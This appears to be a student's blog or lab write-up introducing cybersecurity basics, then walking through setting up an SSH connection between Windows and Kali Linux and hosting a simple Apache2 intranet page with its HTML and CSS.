Cybersecurity is the field of study and practice that responds to these challenges as technology evolves. In a formal definition by CISCO:

“Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks.”

Digital attacks can cover a whole range from fraudulent emails to a targeted shutdown of a website’s traffic. Defenses against these attacks, then, must be learned and implemented at all levels.

The CIA Triad

A basic, overarching model for cybersecurity, particularly as it relates to information, is the CIA Triad. CIA stands for Confidentiality, Integrity, and Availability (not the US Central Intelligence Agency). Nearly all information security policies trace back to this model. Let’s go through each component of this triad.

Confidentiality

This pillar of the triad refers to protecting private information from eyes that shouldn’t have access to it. Confidentiality is the need to enforce access — who can see this, and who shouldn’t? For example, we don’t want to give our social security number to just anyone, but we trust that the institutions we give them to — like tax services — implement the right security measures to keep it secret. So what tools are used to guarantee the right access?

Some of the ways confidentiality is managed are:

• Keeping levels of access and setting permissions
• Encrypting data and files
• Requiring multi-factor authentication

Integrity

Integrity refers to data integrity here. We need security controls that protect data from being changed or deleted. We must also ensure that the damage can be reversed if data was changed accidentally or by the wrong person. Some techniques related to integrity are:

• Keeping backups of the data in its correct state, and logging versions
• Using cryptography to securely check for changes
• Keeping track of digital signatures to prove integrity of data

Availability

This last pillar refers to data being consistently, reliably available to those authorized. For example, when you login to a social media account and want to set your privacy settings, you expect all the correct settings you had set before to appear immediately. The social media company ensures that even with high traffic, information gets to your screen. How is this accomplished?

• Always monitoring servers and networks
• Maintaining hardware and software
• Having a plan for disaster recovery

The Cybersecurity Industry

In this article, we will break down common domains in cybersecurity.

Cybersecurity is becoming a broader field as more industries migrate onto the Internet and become a part of the digital landscape. That means there are cybersecurity needs in nearly every industry in addition to cybersecurity being an industry itself. Security roles are no longer just the hacker stereotype of cracking into systems and writing code all the time; cybersecurity as a whole encompasses many skills that work together.

In this article, we’ll break down some of the big domains in the cybersecurity industry. There are lots of overlap between different domains and cybersecurity careers, so keep in mind that the domains are not drawn with hard lines, especially as they keep evolving.

Security engineering

This section refers to the technical implementation of various forms of security.

• Information security, or InfoSec, protects data in any form from being accessed, modified, shared, or deleted by the wrong people.
• Network security is concerned with the network infrastructure of an organization that guards against unauthorized access or data from being intercepted.
• Application security refers to implementing measures that defend an application (mobile, desktop, or web) from attack, including both software and hardware solutions. Examples of application security include secure coding, the use of antivirus programs, firewalls, and encryption.
• Cloud security refers to the new field of making sure resources uploaded into the cloud are secure. Companies and users are constantly moving more resources into the cloud, and professionals in this field need to be familiar with implementing security in this environment.
• Cryptography focuses on methods to hide and un-hide information so that data is only readable or usable by authorized people. This requires familiarity with all types of encryption and hashing algorithms.
• Critical infrastructure security is defending physical systems that are becoming more digital/networked, such as energy grids, hospitals, water and waste systems, and even schools. Among the issues that come up are natural disasters and outages.

Governance and compliance

It’s critical to understand international, federal, and state laws and regulations for security. This has implications on the security operations for all organizations. Compliance refers to making sure an organization enforces certain policies, and continuously auditing as well.

This is becoming an increasingly important area of work. While these roles might not require programming knowledge, these roles require foundational knowledge of cybersecurity as well as all the laws and regulations that impact a particular industry.

Risk management and threat intelligence

No system will ever be perfect, and there will always be risk, so this area of work is about managing that risk.

How is risk managed? Through identifying risks, assessing the likelihood and potential threat of security vulnerabilities, and finding the most cost-effective and efficient security measures.

Threat intelligence is the continuous gathering of knowledge of possible attacks. Intelligence could look like knowing the motivations behind attacks, what the scale of attacks could be, and what vectors that might use. These roles often intersect with data science and machine learning because of the need to process all this information.

Security operations

People who work in this area are responsible for implementing security principles, monitoring for incidents, and recovering from disasters. They work closely with everyone under the security umbrella to:

• Detect when something has gone wrong.
• Implement preventative measures against cyber attacks.
• Make sure there are back-ups in case a system is compromised and data is lost.
• Track changes to a system.
• Come up with disaster recovery plans in advance
• Create documents and organization policies for all of the above.

Education

Security education is a growing area in itself! This domain acknowledges that the most securely designed technologies are only as strong as the people who use them. User education teaches best practices for people to protect themselves against cyber threats. Security training also happens in large organizations, where employees are educated and updated on the organization’s security policies and practices.

This domain can also include the career development and training of new security professionals as well.

Introduction: The SSH protocol, also known as Secure Shell, is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, as it protects the connections and communications\ security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).

Differentiate Between SSH and TELNET
SSH (Secure Shell):

• Security: SSH provides a secure and encrypted communication channel over an unsecured network (such as the internet).
• Authentication: Utilizes public-key cryptography, password authentication, or a combination for user authentication.
• Encryption: Encrypts the entire session, including data transfer and user credentials, ensuring confidentiality.
• Port: Typically uses port 22 by default.
• Use Case: Widely used for remote access to servers and network devices with a focus on security.

Telnet:

• Security: Telnet transmits data in plain text, making it vulnerable to eavesdropping and interception.
• Authentication: Uses simple username and password authentication, sending credentials in plain text.
• Encryption: Lacks encryption, exposing sensitive information during communication.
• Port: Typically uses port 23 by default.
• Use Case: Historically used for remote access but now largely replaced by more secure protocols like SSH.

process:

First we need to ready those device for connection.

Installing OpenSSL on Windows involves downloading the OpenSSL installer and running it. Here are step-by-step instructions:

To install an SSH server on a Windows machine, you can use the OpenSSH for Windows package. Here are step-by-step instructions:

Installing OpenSSH on Windows:

1. Enable OpenSSH Feature:

• Open the “Settings” app on your Windows machine.
• Go to “Apps” > “Optional Features.”
• Scroll down and find “OpenSSH Server.” Click on it.
• Click “Install” to enable the OpenSSH feature.

1. Start the SSH Server Service:

• Open the “Services” application. You can do this by pressing Win + R, typing services.msc, and pressing Enter.
• Find the “OpenSSH SSH Server” service in the list.
• Right-click on it, and select “Start.”

1. Configure SSH to Start Automatically:

• Right-click on the “OpenSSH SSH Server” service.
• Select “Properties.”
• In the “Startup type” dropdown, choose “Automatic.” This ensures that the SSH server starts automatically with Windows.

Now SSH service is ready for your windows machine .. its time to kali linux.

Kali Linux typically comes with the OpenSSH client pre-installed. If you want to set up an OpenSSH server on Kali Linux, you can follow these steps:

Install OpenSSH Server on Kali Linux:

Open a terminal on your Kali Linux machine and run the following commands:

$sudo apt install openssh-server

Start SSH service and Enable this service

To check this service we use this command :

$sudo service ssh status 

If the service is Inactive then we use this command line to start service.

$sudo service ssh start

after start the service we again check the status of openssh.. Now its running in kali.

Now The connection Between two Device..

First we need to know the host machine ip address for ssh connection. To know this here the command.

$ifconfig

now In windows machine I open cmd for connect the host machine.. and type .

>ssh server@192.168.0.148

the command description is ..

ssh <the_host_name>@<the_domain_of_target_machine>

here the connection

Now we execute some command in this host machine.

we execute some command in secure shell connection.we can also use ftp,http,tcp protocol in ssh.

To exit the connection we need to write exit.

Discussion:

1. Security Enhancement:

• SSH, being a secure protocol, ensures that communication between the client and server is encrypted, reducing the risk of eavesdropping and unauthorized access.

2.Authentication Mechanisms:

• The use of public-key cryptography and strong password authentication in SSH provides robust user authentication, enhancing the overall security posture.

3.Confidentiality:

• The encryption of the entire session in SSH ensures the confidentiality of sensitive information, protecting it from potential attackers.

4.Port Security:

• SSH commonly uses port 22, and by implementing it in the lab, we ensure that the chosen port is open and properly configured for secure communication.

Conclusion:

Implementing SSH in the lab environment brings several security benefits compared to Telnet. The use of encryption, strong authentication mechanisms, and the overall security architecture of SSH make it a preferred choice for secure remote access.

By adopting SSH, organizations can mitigate the risks associated with plaintext communication and unauthorized access. The discussion highlights the importance of security protocols in ensuring the confidentiality and integrity of data during remote access scenarios.

In conclusion, SSH stands out as a more secure and reliable choice for remote access, aligning with modern security standards and best practices. As technology evolves, it becomes imperative to prioritize secure communication methods to safeguard sensitive information in both lab and production environments.

Abstract: In this implementation we use apache2 server in linux distribution. We run our web server in Local host https://127.0.0.1 Here we use a random web server to implement this intranet site.

Introduction: The deployment of a web server service within a local host or intranet environment has become integral to facilitating seamless communication and collaboration among users. Whether for internal corporate networks or personal development environments, establishing a web server allows for the hosting and accessibility of web-based content within a closed network.

Process: In this section we implement this in a organized way..

Firstly we need to check our apache2 server status . for this..

$sudo systemctl status apache2

Here the active status of apache2 is inactive so that we need to start this service

$sudo systemctl start apache2

Interface like this

Now our apache2 server active . Now we go to the web browser and type

https:/127.0.0.1

Here is our apache2 default page

Now in our Intranet server we replace the default page .

In here we need to find out the apache2 server default pages like index.html, style.css , script.php . after found this we replace those with our web design page..

usually this is located in /var/www/html or /var/hd_docs.

In my project it was in /var/www/html directory.. I replace or edit yellow underline file in these code..

Index.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <title>Simple Intranet</title>
</head>

<body>
    <header>
        <h1>Company Intranet</h1>
    </header>

    <nav>
        <ul>
            <li><a href="#home">Home</a></li>
            <li><a href="#announcements">Announcements</a></li>
            <li><a href="#documents">Documents</a></li>
            <li><a href="#calendar">Calendar</a></li>
        </ul>
    </nav>

    <main>
        <section id="home">
            <h2>Welcome to our Intranet!</h2>
            <p>This is a simple intranet site for internal collaboration.</p>
        </section>

        <section id="announcements">
            <h2>Announcements</h2>
            <ul>
                <li><strong>Important Announcement:</strong> Lorem ipsum dolor sit amet.</li>
                <li><strong>New Policy:</strong> Consectetur adipiscing elit.</li>
            </ul>
        </section>

        <section id="documents">
            <h2>Documents</h2>
            <ul>
                <li><a href="#">Employee Handbook</a></li>
                <li><a href="#">Meeting Minutes</a></li>
            </ul>
        </section>

        <section id="calendar">
            <h2>Calendar</h2>
            <iframe src="https://calendar.google.com/calendar/embed?src=yourcalendarid" style="border: 0"
                width="800" height="600" frameborder="0" scrolling="no"></iframe>
        </section>
    </main>

    <footer>
        <p>&copy; 2023 Company Intranet</p>
    </footer>
</body>

</html>

Style.css

body {
    font-family: 'Arial', sans-serif;
    margin: 0;
    padding: 0;
}

header {
    background-color: #333;
    color: #fff;
    text-align: center;
    padding: 1em 0;
}

nav {
    background-color: #444;
    color: #fff;
    padding: 0.5em;
}

nav ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: space-around;
}

nav a {
    color: #fff;
    text-decoration: none;
}

main {
    padding: 1em;
}

section {
    margin-bottom: 2em;
}

footer {
    background-color: #333;
    color: #fff;
    text-align: center;
    padding: 1em 0;
}

I edit these files. I gave permission to execute these like this..

$sudo chmod +x index.html

$sudo chmod +x style.css

After this i restart my apache2 server like this..

$sudo systemctl restart apache2

Now the present intranet webserver look like..

Now our Intranet server is ready .

Discussion:

The implementation of the web server service within the local host or intranet environment marks a significant stride towards enhancing internal communication and collaboration. Several key points emerge from the development and deployment of the server, providing insights into its functionality, challenges encountered, and the potential for future improvements.

Functionality and User Experience:

The web server successfully serves static content, presenting a user-friendly interface accessible through a web browser. The design, consisting of an index.html landing page and a styles.css stylesheet, contributes to a clean and visually appealing user experience. Users can easily navigate through sections such as "Home," "Announcements," "Documents," and "Calendar," fostering a seamless interaction with the intranet content.

Conclusion:

In conclusion, the implementation of the web server service establishes a foundational platform for internal collaboration within the local host or intranet environment. The project successfully achieves its primary objectives by providing a straightforward yet effective intranet solution. The integration of HTML and CSS for content presentation, along with the potential for future expansion through server-side scripting, positions the web server to evolve based on organizational needs.